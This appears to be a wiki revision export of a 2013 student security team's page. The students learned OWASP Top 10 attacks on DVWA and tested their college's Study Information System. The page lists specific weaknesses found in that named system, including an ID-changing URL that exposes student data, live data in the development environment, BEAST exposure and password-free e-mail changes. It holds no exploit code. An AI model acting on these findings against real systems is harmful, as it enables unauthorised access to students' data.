** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;[http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Final presentation of the projects on the 4 April 2013 at room 316 (video)]&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** Googeled a lot&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62371</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62371"/>
		<updated>2013-04-05T06:02:02Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Materials (slides etc) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of project on the 4 April 2013 [[Media:2013_security_final_presentation.pdf]] (Made by whole team, structure by Sandra and Jurij)&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;[[http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Final presentation (video)]]&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
